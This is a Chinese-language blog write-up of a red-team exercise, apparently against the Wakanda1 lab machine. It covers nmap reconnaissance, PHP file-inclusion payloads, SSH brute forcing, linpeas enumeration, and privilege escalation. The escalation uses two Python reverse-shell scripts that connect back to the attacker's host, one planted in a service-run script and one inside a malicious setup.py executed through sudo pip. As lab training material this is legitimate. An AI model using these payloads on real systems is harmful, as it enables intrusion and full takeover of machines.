跳到主要内容一次红队渗透实战项目记录 | 极客日志Shell / Bash
一次红队渗透实战项目记录
综述由AI生成记录了一次红队渗透实战全过程。从信息收集开始,利用 nmap 扫描存活主机及开放端口,通过 Web 目录扫描发现文件包含漏洞。获取密码后暴力破解 SSH 登录,进入系统后进行权限提升。通过 linpeas 脚本和 find 命令枚举敏感文件,发现 devops 用户的计划任务。利用计划任务执行反弹 Shell 获取更高权限,最终通过 sudo pip 配置恶意包实现提权至 root,获取最终 Flag。整个过程涵盖了网络侦察、Web 漏洞利用、SSH 爆破、内网枚举及 Linux 提权技术。
leon20 浏览 一次红队渗透实战项目记录
前言
本文记录了一次红队渗透实战的全过程,涵盖信息收集、漏洞利用、权限提升等关键环节。
一、信息收集
信息收集非常重要,有了信息才能知道下一步该如何进行。接下来将用 nmap 来演示信息收集。
1. nmap 扫描存活 IP
由于本项目环境是 NAT 模式需要项目 IP 地址,扫描挖掘本地的 IP 地址信息:
本机 IP 为:192.168.40.177。
发现本 Kali IP 为 40 段!用 40 段进行全网段扫描:
nmap -sP 192.168.40.0/24
Nmap scan report for localhost (192.168.40.190)
发现项目 IP 地址:192.168.40.190。
2. nmap 全端口服务枚举
进行 nmap 端口服务枚举:
nmap -p- 192.168.40.190
得到开放的端口信息:
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes ssh OpenSSH 6.7p1
47046/tcp open unknown
开启了 80、111 和 3333 端口,继续探测下端口信息:
nmap 192.168.40.190 -p80,111,3333,35523 -A -T5
可以详细看到端口开启的版本信息,就从 Web 页面信息枚举信息!
3. Web 信息枚举
访问 Web 页面:
http://192.168.40.190/
没有什么可用信息!扫描下目录枚举下信息。
4. dirb 目录扫描
dirb 扫描目录:
dirb http://192.168.40.190/
dirb 扫出的目录都是访问空白页面!
查看主页的静态源码发现:
?lang= ,出现这种形式,很可能是 SQL 注入或文件包含。
访问下该目录:
http://192.168.40.190/?lang=fr
发现跳转回了主页。
利用 dirb 扫描:
dirb http://192.168.40.190/?lang=
发现存在 fr 和 index:
http://192.168.40.190/?=fr
http://192.168.40.190/?=index
lang
lang
尝试访问 fr.php 和 index.php,发现都跳转回主页!
curl -i http://192.168.40.190/?lang=fr
curl -i http://192.168.40.190/?lang=index
fr: HTTP/1.1 200 OK
index: HTTP/1.0 500 Internal Server Error
疑似存在文件包含,该文件底层可能存在 include() 函数,开始测试!
二、文件包含
PHP 存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。
- 字符串过滤器:用户输入的内容会转换为大写、小写、ROT13 字符、或者去除 php 标记等功能。
- 转换过滤器:就是用户输入的数据转换为 base64 编码和解码功能,还有将字符串转换为 8-bit 字符串功能。
- 压缩过滤器:zip 中有 zlib 和 bzip2 等函数协议,功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。
- 加密过滤器 mcrypt 是 php 里面重要的加密支持扩展库,主要是用 mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。
那么不管是哪些过滤器,都可以尝试下面六种方法去操作测试是否可以进行文件包含:
/index.php?page=/etc/passwd
/index.php?page=../../../../../etc/passwd
/index.php?page=php://filter/read=...
/index.php?page=php://filter/convert.base64-encode/resource=...
/index.php?page=zip://page=data://
curl http://192.168.40.190/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d
但是不知道是哪个用户的密码,爆破 SSH 获得用户名!
三、SSH 用户名枚举爆破
1. cewl 枚举用户名
cewl http://192.168.40.190/
2. 暴力破解 SSH
利用实战常用的 gorailgun.exe。
记得修改下端口,项目 SSH 端口为 3333。
四、内部信息枚举
1. SSH 登录
输入进来发现这是 Python 2.7.9 的命令框。
通过 Python 获得 Bash 正常 Shell:
import pty;pty.spawn('/bin/bash');
2. 脚本信息枚举
开启 HTTP 服务上传扫描脚本 linpeas.sh:
python -m SimpleHTTPServer 8081
wget http://192.168.40.177:8081/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
发现新用户是 1002,说明包含了 2 个权限 uid=1001(devops) gid=1002(developer) groups=1002(developer)。
root 权限 pip,PIP 是 Python 包或模块的包管理器,包含模块所需的所有文件 rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip。
3. find 深入枚举
利用 find 针对 mamadou 查看可运行权限文件:
find / -user mamadou 2>&1 | grep -v "Permission denied"
cat /home/mamadou/flag1.txt
Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
通过前面脚本枚举还发现存在另一个用户:devops,也利用 find 针对 devops 查看其可运行权限文件:
find / -user devops 2>&1 | grep -v "Permission denied|proc"
/srv/.antivirus.py
/tmp/test
/home/devops/flag2.txt
尝试打开 flag2.txt:cat /home/devops/flag2.txt
提示无权限打开!
open('/tmp/test','w').write('test')
查看下 antivirus 是否存在计划任务启动该脚本:
find / -name *antivirus* 2>&1 | grep -v "Permission denied|proc"
发现存在 antivirus.service 服务!
cat /lib/systemd/system/antivirus.service
提示存在该服务存在计划任务,每 5 分钟 devops 用户执行一次。
RestartSec=300
User=devops
五、计划任务反弹 Shell
1. 写入计划任务
def con():
import socket, time, pty, os
host='192.168.40.177'
port=9999
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
等 5 分钟成功反弹 devops 用户 Shell!
六、内部信息枚举–devops
1. 组信息枚举
developer 1002: —可看到还存在 group 组里的 developer。
2. find 查看权限文件
利用 find 针对 developer 查看可运行权限文件:
find / -group developer 2>&1 | grep -v "Permission denied|proc"
发现存在:/usr/bin/pip 可运行文件和 flag2。
3. 获取 Flag
cat /home/devops/flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
grep -rn / -e devops 2>&1 | grep -v "Permission denied|proc"
没发现新的东西,但是可看到 devops 的 ID 为 1002 是共用的!
/etc/subgid:11:devops:755360:65536
/etc/group:56:devops:x:1001:/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash
/etc/subuid:11:devops:755360:65536
4. sudo 提权
提示用户可以在 /usr/bin/pip 执行 sudo:
User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
七、pip 提权
pip 可执行 sudo 提权,那就利用 pip 写入 py 脚本运行。
将 host 更改为本地 Kali 地址,端口随拟。
from setuptools import setup
import socket, subprocess, os
def con():
import socket, time, pty, os
host='192.168.40.177'
port=4455
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
setup(name="root", version="1.0")
到 tmp 目录下上传 setup.py 脚本至靶机:
cd /tmp
wget http://192.168.40.177:8081/setup.py
sudo pip install setup.py .
flag:821ae63dbe0c573eff8b69d451fb21bc
提权 pip:拓展思路
proxychains git clone https://github.com/0x00-0x00/FakePip.git
cd FakePip
cat setup.py
gedit setup.py
将 lhost 改为本地 Kali 地址,端口可不变:
相关免费在线工具
- Base64 字符串编码/解码
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
- Base64 文件转换器
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
- Markdown转HTML
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
- HTML转Markdown
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
- JSON 压缩
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
- JSON美化和格式化
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online
